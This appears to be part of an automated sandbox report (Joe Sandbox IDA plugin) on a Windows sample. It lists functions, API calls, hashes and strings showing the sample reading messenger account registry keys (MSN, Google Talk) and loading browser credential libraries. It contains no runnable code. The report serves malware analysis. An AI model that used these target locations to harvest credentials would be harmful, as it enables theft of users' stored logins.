                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$ClassCreateRegisterWindowstrncat
                  • String ID: P4A$xDA
                  • API String ID: 3664037073-2763913229
                  • Opcode ID: be5346cb48c8cedca28fb9c953b908c4a3ca165af802d2e293ff076a17b9cc61
                  • Instruction ID: a433a9f07fbe34a5cd63bc5fe357f5218a2175739f92369553503b68093de8d1
                  • Opcode Fuzzy Hash: be5346cb48c8cedca28fb9c953b908c4a3ca165af802d2e293ff076a17b9cc61
                  • Instruction Fuzzy Hash: F1211FB5C01218AFDB50DF95DD85ADFBBBCEB08354F0040BAE549B3251C778AE848BA4
                  Function 004034A5 Relevance: 10.5, APIs: 4, Strings: 3, Instructions: 47stringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 443 4034a5-403505 memset * 2 call 40f232 446 403541-403543 443->446 447 403507-403540 strcpy call 405f29 strcat call 4033b1 443->447 447->446
                  APIs
                  • memset.MSVCRT ref: 004034C5
                  • memset.MSVCRT ref: 004034DB
                    • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
                  • strcpy.MSVCRT(00000000,00000000), ref: 00403516
                    • Part of subcall function 00405F29: strlen.MSVCRT ref: 00405F2A
                    • Part of subcall function 00405F29: strcat.MSVCRT(00000000,00414078,004062C9,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 00405F41
                  • strcat.MSVCRT(00000000,fb.dat,00000000,00000000), ref: 0040352E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memsetstrcat$Closestrcpystrlen
                  • String ID: InstallPath$Software\Group Mail$fb.dat
                  • API String ID: 1387626053-966475738
                  • Opcode ID: 38ec8536de8e14aff3b9b3d106331788fa2226ffb78b3e274a34b9b5a513c2d5
                  • Instruction ID: 36ed55b5d374e154850240320204e9d1b3c473ccad1168af83c786b56a3c059d
                  • Opcode Fuzzy Hash: 38ec8536de8e14aff3b9b3d106331788fa2226ffb78b3e274a34b9b5a513c2d5
                  • Instruction Fuzzy Hash: 8201D8B294012879D720E655DD46FCA7A6C5F34745F0000E6BA48F21C2DAFCABD58B69
                  Function 004076B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004073B6: memset.MSVCRT ref: 00407418
                    • Part of subcall function 004073B6: memset.MSVCRT ref: 0040742C
                    • Part of subcall function 004073B6: memset.MSVCRT ref: 00407446
                    • Part of subcall function 004073B6: memset.MSVCRT ref: 0040745B
                    • Part of subcall function 004073B6: GetComputerNameA.KERNEL32(?,?), ref: 0040747D
                    • Part of subcall function 004073B6: GetUserNameA.ADVAPI32(?,?), ref: 00407491
                    • Part of subcall function 004073B6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004074B0
                    • Part of subcall function 004073B6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004074C5
                    • Part of subcall function 004073B6: strlen.MSVCRT ref: 004074CE
                    • Part of subcall function 004073B6: strlen.MSVCRT ref: 004074DD
                    • Part of subcall function 004073B6: memcpy.MSVCRT ref: 004074EF
                    • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                  • memset.MSVCRT ref: 00407705
                    • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040F299
                  • memset.MSVCRT ref: 00407756
                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00407794
                  • RegCloseKey.ADVAPI32(?), ref: 004077BB
                  Strings
                  • Software\Google\Google Talk\Accounts, xrefs: 004076D6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$ByteCharCloseMulusermeWidestrlen$ComputerEnumOpenUsermemcpy
                  • String ID: Software\Google\Google Talk\Accounts
                  • API String ID: 2959138223-1079885057
                  • Opcode ID: c9cce60634fc59fb7108b3190625f52d3406a5535f91f01c2962c8a28a0ab0b7
                  • Instruction ID: a99152f29cb3baba476c483fa4670b136c65b11177ef5495e630776d68c42b47
                  • Opcode Fuzzy Hash: c9cce60634fc59fb7108b3190625f52d3406a5535f91f01c2962c8a28a0ab0b7
                  • Instruction Fuzzy Hash: 93219471408209BED610DE51DD42EABBBECEF84344F00043AB944D1192E635DD5D9BA7
                  Function 0040F4CA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74registrystringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040F41D: LoadLibraryA.KERNEL32(shell32.dll,0040BBB8,76F90A60,?,00000000), ref: 0040F42B
                    • Part of subcall function 0040F41D: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040F440
                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 0040F501
                  • memset.MSVCRT ref: 0040F51F
                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040F588
                  • strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040F596
                    • Part of subcall function 00406282: GetVersionExA.KERNEL32(00418118,0000001A,0040F4E8,00000104), ref: 0040629C
                  Strings
                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040F53A, 0040F54A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersionmemsetstrcpy
                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                  • API String ID: 1359237156-2036018995
                  • Opcode ID: 688813e34a40ff9dac7194856c9665e444ed430276b4d0f07d4d5b497ec3e936
                  • Instruction ID: 8c400c1df07908664f594f880775229253182a5e7b911f92c7f22337ad7f8634
                  • Opcode Fuzzy Hash: 688813e34a40ff9dac7194856c9665e444ed430276b4d0f07d4d5b497ec3e936
                  • Instruction Fuzzy Hash: 34119971801114BADB30AA989C899DF77AC9715308F5400BBFD51B2593D6385F9C8A99
                  Function 0040A632 Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040A64F
                    • Part of subcall function 00405E36: LoadCursorA.USER32(00000000,00007F02), ref: 00405E3D
                    • Part of subcall function 00405E36: SetCursor.USER32(00000000,?,0040BCA6), ref: 00405E44
                  • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040A672
                    • Part of subcall function 0040A5A1: sprintf.MSVCRT ref: 0040A5C7
                    • Part of subcall function 0040A5A1: sprintf.MSVCRT ref: 0040A5F1
                    • Part of subcall function 0040A5A1: strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A604
                    • Part of subcall function 0040A5A1: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A62A
                  • SetCursor.USER32(?,?,0040B7F8), ref: 0040A697
                  • SetFocus.USER32(?,?,?,0040B7F8), ref: 0040A6A9
                  • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040A6C0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessageSend$Cursor$sprintf$FocusLoadstrcat
                  • String ID:
                  • API String ID: 2210206837-0
                  • Opcode ID: c4500f01a9179d05fffa9e4a2d537714384da649f00e33917d281301b44e2473
                  • Instruction ID: 509cc9229267159212bead5259dcc336d8983f4e7fdf05ffa4c6fe4d4677fdd3
                  • Opcode Fuzzy Hash: c4500f01a9179d05fffa9e4a2d537714384da649f00e33917d281301b44e2473
                  • Instruction Fuzzy Hash: C601E9B1244604EFD326AB75CD89FA6B7E9FF48305F0544B9F15D9B271CA716E018B10
                  Function 00403946 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 0040399F
                    • Part of subcall function 0040DC39: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040DD05
                    • Part of subcall function 0040DC39: strlen.MSVCRT ref: 0040DD15
                    • Part of subcall function 0040DC39: strcpy.MSVCRT(?,?), ref: 0040DD26
                    • Part of subcall function 0040DC39: LocalFree.KERNEL32(?), ref: 0040DD33
                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 004039D1
                  Strings
                  • Software\Microsoft\MSNMessenger, xrefs: 00403999
                  • Software\Microsoft\MessengerService, xrefs: 004039CB
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Openstrcpy$ByteCharFreeLocalMultiWidestrlen
                  • String ID: Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService
                  • API String ID: 1910562259-1741179510
                  • Opcode ID: cd4cad58a6bbdb2152182e06e1211f683bfeac5af0318659dfdfa5e05705f839
                  • Instruction ID: a8690c8f59c2d6ddd84299c782105f2e65a9bc437c951c5f77a69b85a32d1474
                  • Opcode Fuzzy Hash: cd4cad58a6bbdb2152182e06e1211f683bfeac5af0318659dfdfa5e05705f839
                  • Instruction Fuzzy Hash: 1111D8B1108309AED320EE5198818ABBFEC9B95355F50843FF544A2081D3789A4DCAAB
                  Function 0040F0E3 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040F10B
                    • Part of subcall function 00406792: sprintf.MSVCRT ref: 004067CA
                    • Part of subcall function 00406792: memcpy.MSVCRT ref: 004067DD
                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040F12F
                  • memset.MSVCRT ref: 0040F146
                  • GetPrivateProfileStringA.KERNEL32(?,?,0041344F,?,00002000,?), ref: 0040F164
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: PrivateProfileStringmemset$Writememcpysprintf
                  • String ID:
                  • API String ID: 3143880245-0
                  • Opcode ID: 0d5fc167f86d686615e01c1cacfdddd6df1b8ca8c3ebe4bad4095cdeb2aac3fe
                  • Instruction ID: bc019f7bd72990c6dd937b38e23e5507a0673011dafb680486f8cad4f2b6b185
                  • Opcode Fuzzy Hash: 0d5fc167f86d686615e01c1cacfdddd6df1b8ca8c3ebe4bad4095cdeb2aac3fe
                  • Instruction Fuzzy Hash: DF01657240421DAFEF16AF50DD89EDB7B79EF04344F104076B609A1052D6359A64DB68
                  Function 004079E7 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ??2@
                  • String ID:
                  • API String ID: 1033339047-0
                  • Opcode ID: 5da1b589d0a8832eef683b15a6d122c0a6d1a7040e709ba4429a645e3444abce
                  • Instruction ID: c43431202d49818a45d5cc7318ffcbdb911bff3577ce92db202b1535657ef0fb
                  • Opcode Fuzzy Hash: 5da1b589d0a8832eef683b15a6d122c0a6d1a7040e709ba4429a645e3444abce
                  • Instruction Fuzzy Hash: C2F0FFB1542210AEDB94DB34EE467953AE6E708354F10813EE60ACA2B1FFB85440CB0C
                  Function 00406104 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                  Download Yara Rule
                  APIs
                  • malloc.MSVCRT ref: 00406120
                  • memcpy.MSVCRT ref: 00406138
                  • free.MSVCRT(00000000,00000000,76F90A60,00406B78,00000001,?,00000000,76F90A60,00406EF2,00000000,?,?), ref: 00406141
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: freemallocmemcpy
                  • String ID:
                  • API String ID: 3056473165-0
                  • Opcode ID: 2c99a99ae30e83ce40482d8e5bccf8072ec36ae410a4a270b365b928ce6b5d38
                  • Instruction ID: 359978e28c917f6ac826eaac10a3cae38cc8b637956f46d5a6e637dfc07492fc
                  • Opcode Fuzzy Hash: 2c99a99ae30e83ce40482d8e5bccf8072ec36ae410a4a270b365b928ce6b5d38
                  • Instruction Fuzzy Hash: DFF089726052229FC708AF76A98145BB79DAF48354712487FF505E7282DB38DCA0C7A4
                  Function 0040625C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040619B: memset.MSVCRT ref: 004061A5
                    • Part of subcall function 0040619B: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406273,Arial,0000000E,00000000), ref: 004061E5
                  • CreateFontIndirectA.GDI32(?), ref: 0040627A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateFontIndirectmemsetstrcpy
                  • String ID: Arial
                  • API String ID: 3275230829-493054409
                  • Opcode ID: 4817efd26ad33d4b637fc7e29178505d6c073bef41158034ee275bb9fa043b80
                  • Instruction ID: 6f23277ce9f10cc220d5cb12b38cfb89722835dabc034d80cc056b5664af2580
                  • Opcode Fuzzy Hash: 4817efd26ad33d4b637fc7e29178505d6c073bef41158034ee275bb9fa043b80
                  • Instruction Fuzzy Hash: 8FD01270D4020D77E610FBA0FC07FC97BAC5B00B05F504431B901F50E6FAE8E2598699
                  Function 0040A175 Relevance: 3.0, APIs: 2, Instructions: 26windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A190
                  • SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A1AA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: dd3c990b6f06f7b2c2dc03ff0729752becd90f53d511295c87def889df5af8d9
                  • Instruction ID: e11a758ee00da1144c6059c362540eea0e8ddd3b96c7f8f8d0d1d8718a4c60ba
                  • Opcode Fuzzy Hash: dd3c990b6f06f7b2c2dc03ff0729752becd90f53d511295c87def889df5af8d9
                  • Instruction Fuzzy Hash: E2E08C727803107AF2208A845C82FB6A29C9BA5B96F14443BB310AA0D086FC6D1597A9
                  Function 0040492F Relevance: 3.0, APIs: 2, Instructions: 26stringwindowCOMMON
                  Download Yara Rule
                  APIs
                  • strlen.MSVCRT ref: 0040494C
                  • SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404970
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessageSendstrlen
                  • String ID:
                  • API String ID: 2816241398-0
                  • Opcode ID: cb208c766c1001eb7ba4300ff83e866a755fc887a556a9000c54e44cd27ded0d
                  • Instruction ID: 9d3c5f83707486ce63b794c921ddeab77c6af5fa5737131b185e384af3409ada
                  • Opcode Fuzzy Hash: cb208c766c1001eb7ba4300ff83e866a755fc887a556a9000c54e44cd27ded0d
                  • Instruction Fuzzy Hash: 51F0FEB1D0420EAFDF04DF95D9457EEBBB8BB08315F108429E914B2281D7788641CFA4
                  Function 004047AA Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004047FB: FreeLibrary.KERNELBASE(?,?), ref: 00404810
                  • LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,76DBEC10), ref: 004047B2
                  • GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Library$AddressFreeLoadProc
                  • String ID:
                  • API String ID: 145871493-0
                  • Opcode ID: 79a2d912799eded2ecd004947e833272afd2c53e23871a46eb3e118a9608fd27
                  • Instruction ID: a05247dfa83e1e5897bdf1ebfda0bf15c3173a66790072ff667e3a7d903ceddc
                  • Opcode Fuzzy Hash: 79a2d912799eded2ecd004947e833272afd2c53e23871a46eb3e118a9608fd27
                  • Instruction Fuzzy Hash: C6F0E5B46007038BD720DF39D849797B7E8AF45701F00853EF166E3185E778A641C758
                  Function 0040174E Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ??2@??3@memcpymemset
                  • String ID:
                  • API String ID: 1865533344-0
                  • Opcode ID: d4079c97fea363649fd402a4fcc1020c1411aa7f5a7ac2feb31ee8da9293c8e4
                  • Instruction ID: 98d015050fab8b107beb11645b231ec9ddeee47dde9a658ed6f4cbb8f47cff71
                  • Opcode Fuzzy Hash: d4079c97fea363649fd402a4fcc1020c1411aa7f5a7ac2feb31ee8da9293c8e4
                  • Instruction Fuzzy Hash: E1117C31900609EFCF11AF90C804AEE3BB1FF08320F10C16AF8156B2A0C7799A51DF69
                  Function 0040F17F Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                  Download Yara Rule
                  APIs
                  • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 0040F1A6
                    • Part of subcall function 0040F097: memset.MSVCRT ref: 0040F0B5
                    • Part of subcall function 0040F097: _itoa.MSVCRT ref: 0040F0CC
                    • Part of subcall function 0040F097: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0040F0DB
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: PrivateProfile$StringWrite_itoamemset
                  • String ID:
                  • API String ID: 4165544737-0
                  • Opcode ID: 60443182dfafd2705f0bd8163bf991a75ed65358abc62ac36d7f3c586c4344a1
                  • Instruction ID: ef80bc42b69c7626de0f5e8b39bb4bd6d74a87ec05759e80c101291bc1ad5009
                  • Opcode Fuzzy Hash: 60443182dfafd2705f0bd8163bf991a75ed65358abc62ac36d7f3c586c4344a1
                  • Instruction Fuzzy Hash: 22E0B632004209FBCF125F90EC01AA93FA6FF04315F148479F95C14961E33295B4AB84
                  Function 004017BD Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: b09b4f46af4af4ec09f127408c7b8750a63144aa3ee2ed7c4ad6510036d3ab84
                  • Instruction ID: ac6048c5c4f70b5451fe2278e29ff5f30c102ff2b03874ea15ff7294586fe6d8
                  • Opcode Fuzzy Hash: b09b4f46af4af4ec09f127408c7b8750a63144aa3ee2ed7c4ad6510036d3ab84
                  • Instruction Fuzzy Hash: 99E08C31E04108DBCF10ABA189465DE77B2AB04325F10C1A6E961772E1C3781E41CF69
                  Function 004047FB Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                  Download Yara Rule
                  APIs
                  • FreeLibrary.KERNELBASE(?,?), ref: 00404810
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
